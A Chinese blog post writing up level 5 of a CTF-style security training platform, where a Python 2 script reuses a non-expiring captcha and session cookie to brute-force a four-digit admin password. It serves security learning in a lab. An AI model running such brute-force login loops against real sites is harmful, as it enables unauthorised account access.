网络信息安全学习平台脚本关-第五关

最新推荐文章于 2021-05-04 16:15:59 发布
最新推荐文章于 2021-05-04 16:15:59 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Python 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ac_0_summer/article/details/53414811
版权

脚本关之逗比验证码第一期:地址

这道题模拟登陆页面,查看源代码发现有,username, pwd ,vcode,
其中username已经给出,且提示pwd为四位数的数字,下面有验证码
用python写一个脚本自动的跑1000~10000的密码,暴力破解,据说验证码不会过期所以,获取一个验证码之后一直用这个验证码然后跑密码登陆,获取返回的页面,直到返回页面没有错误,则说明得到了密码,至于验证码为什么不过期由于做这个题的目的是学习python,所以就不关心了
注意:除了data,还需要设置headers中的cookie,否则提示
这里写图片描述
代码:

#coding: gbk
#coding: utf-8

import urllib
import urllib2
import re

url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
for pwd in range(1000,10000):
    values = {'username': 'admin', 'pwd': pwd, 'vcode': 'BAKD'}
    data = urllib.urlencode(values)
    header = {'Cookie': 'PHPSESSID=dc4adc828abed413e7d164ac9af7ef33'}
    req = urllib2.Request(url, data, headers=header)
    res = urllib2.urlopen(req)
    content = unicode(res.read(), 'utf-8').encode('gbk')
    if 'error' in content:
        print 'try:', pwd
    else:
        print 'right pwd:', pwd
        print content
        break;

结果:
这里写图片描述

AC_0_summer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络信息安全 ppt
10-16
第04章 口令攻击(5).ppt 第05章 缓冲区溢出.ppt 第六章 脚本攻击.ppt 第07章 特洛伊木马.ppt 第8章 嗅探.ppt 第09章 假消息攻击.ppt CNCERT CC 2007 年上半年网络安全工作报告.pdf 第20次中国互联网络发展状况统计...
网络安全实验室-脚本1-15
hzxtjx的博客
07-09 1814
发送到bp,抓包点击到这里找key发送到repeater后send 随便提交数据发现没有用,抓包也没有找到 所以2秒的提交手动计算肯定不行,借助Python脚本 正则表达式匹配内容(包含空格): 什么才是空的呢?:空的字符串、常量等(‘’,“”,null,none,NULL,None,void…) 提交答案(小写即可):猜测是常量,null,一试果然就是 注:本题运气,无技术参考价值进入靶场点击没反应 F12查看源码 找到js源码 发现可疑代码 Ctrl+s把网页保存到本地 删除return false的
CTF [网络安全实验室] [脚本]
weixin_45253622的博客
05-04 1万+
脚本 1.key又又找不到了? emmmm 抓包放包key就出来了,和基础的差不多。 2.快速口算 试着写下脚本: # -*- codeing = utf-8 -*- # @Time : 2021/5/4 10:46 # @Author : rexu # @File : 2sadd.py # @Software : PyCharm import requests,re s = requests.Session() url = "http://lab1.xseclab.com/xss
网络安全攻防实验室通教程-脚本
黑面狐
10-19 1万+
网络安全攻防实验室地址: 传送门:http://hackinglab.cn 脚本: 很多题目都是可以通过写python发暴力破解或者爬虫,写脚本比较花时间,所以我优先使用burpsuite 题目一:key又又找不到了 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!!  还是开启fiddler抓数据包。 点击“到这里找ke
网络信息安全攻防实验室 脚本第五
瞭望的叶子的专栏
05-19 1491
逗比的验证码,有没有难道不一样吗? 这一的验证码没有设置成post提交一次就失效,所以在获取得到了验证码以后,可以直接多次提交,用python脚本来实现,代码如下:
网络信息安全攻防学习平台-脚本 writeup
热门推荐
4ct10n
09-17 2万+
1.key又又找不到了直接burpsuit截断 出flag key is : yougotit_script_now2 .快速口算这道题比较有意思 在两秒钟之内回答他的算术题 思路:直接编写python脚本访问网站,获取html计算算式,得出答案,post传参,注意要建立长连接。 代码如下:#-*-coding:utf-8-*- import requests, re url = '
网络安全技术课程.pdf
05-05
适合入门学习网络安全人群,总共有258页,含实战。 目录: 第1章 信息收集 第2章 SQL注入攻击 第3章 xss跨站脚本攻击 第4章 后台弱口令 第5章 命令执行 第6章 文件上传漏洞 第7章 结语
violent-python:有渗透测试,Web,网络和无线设备利用的脚本和代码示例
05-11
使用IP和图像对人员进行地理位置定位Firefox抓取工具,用于下载已保存Cookie的数据库,下载文件列表和过去的浏览器历史记录从网络上保存的数据包中找出DDos攻击的来源第五章处理Wifi数据包。 Wifi数据包嗅探器以...
shell脚本学习指南[六](Arnold Robbins & Nelson H.F. Beebe著)
01-20
学shell到现在了,一直以为自己不会犯一个大家常说的非常二的问题,结果这本书最后的时候犯了个十分2的事,晚节不保啊!...第十五章安全的shell脚本:起点 安全性shell脚本的提示:1、不要将当前目录
网络信息安全攻防学习平台-脚本5 解析
m0_52934811的博客
03-15 307
题目如下: 进入卡地址后,从题目的内容得出,可以用抓包工具Burp Suite对密码进行暴力破解。 以火狐浏览器为例子,添加一个为Foxyproxy的插件进行代理,以配合抓包软件。 添加完成后配置一个端口为8080的本地的代理地址:配置完成后打开右上角的代理同时打开所需要的抓包软件: 然后在题目上随意的打上密码,输入正确的验证码后点击submit 此时打开Burp Sutie得到以下内容:鼠标点击页面空白处选择Send to lntruder 点击Intruder后 ...
网络安全实验室 脚本 解析
wh1te 小白的博客
10-11 3520
第一 key又又找不到了 打开源码发现有一个 search_key.php点进去即可找到 第二 快速口算 看起来就很难   很长的算式两秒答  应该要写脚本 使用python写 先将算式爬下来 具体如下  调用了request 和xpath 在爬虫中xpath很好用  火狐有插件xpath finder可以直接看见xpath路径 不过我爬出来的结果是一串字符编码  ...
网络安全实验室CTF—基础 writeup
weixin_45871855的博客
04-14 2192
自己总结的解题方法,里面方法仅供查考 本文链接: 网络信息安全攻防学习平台--基础key在哪里?再加密一次你就得到key啦~猜猜这是经过了多少次加密?据说MD5加密很安全,真的是么?种族歧视HAHA浏览器key究竟在哪里呢?key又找不到了冒充登录用户比较数字大小本地的诱惑就不让你访问 key在哪里? 安全攻防基础1 key在哪里? F12或Ctrl+U查看源码,得到flag 再加密一次你就...
网络信息安全攻防平台脚本
木槿华年的博客
08-05 1314
第2题 快速口算 写python代码解决(eval() 函数计算 JavaScript 字符串,并把它作为脚本代码来执行。) 方法一: import requests    #导入requests模块,(requests是python的第三方库,要事先安装) url='http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/...
网络信息安全攻防实验室 脚本第七
瞭望的叶子的专栏
05-19 1153
http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/index.php 这一道题,构造一个Seesion对象即可,利用该对象进行提交就行了
ctf--网络信息安全攻防实验室之基础writeup
mbinary
04-29 3259
此篇文章最先发表在个人博客上, 欢迎访问: smiley: 使用的工具 * chrome * python3 * md5 在线工具 (可搜索到)) 第 1 题 Key 在哪里? 分值: 100 过地址 http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.ph...
快速口算脚本实现
打代码的小女孩
02-28 1082
http://hackinglab.cn/ShowQues.php?type=scripts 第2题:快速口算 小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢? 这里的过地址,每次get请求得到的数据都是变化的,所以需要我们使用脚本获取到相应的数据,并使用脚本计算,这个就很容易了...
网络信息安全攻防平台 脚本第一
瞭望的叶子的专栏
05-18 1455
http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php 虽然上面写着是脚本,但是我还是想看一下它的响应包,果然发现了他的答案
hackinglab 脚本 writeup
xaphoenix的博客
05-28 3167
key又又找不到了先点开通地址 之后点击这个链接,拦截它的response,可以得到key 快速口算写个脚本就行了。利用正则来提取相信息。import requests import re url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' header = {'Cookie':
网络信息安全攻防实验室 脚本第六
瞭望的叶子的专栏
05-19 1171
http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php 这一第五类似,但是验证码验证一次就失效了,实际上和第五是一回事
网络安全应急演练脚本excel
最新发布
11-09
通过使用网络安全应急演练脚本excel,可以有效地记录和管理网络安全应急演练的相信息。这有助于组织和参与者了解演练的目标和过程,及时总结演练结果并提出改进措施,提高网络安全防护能力,减少安全事件的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值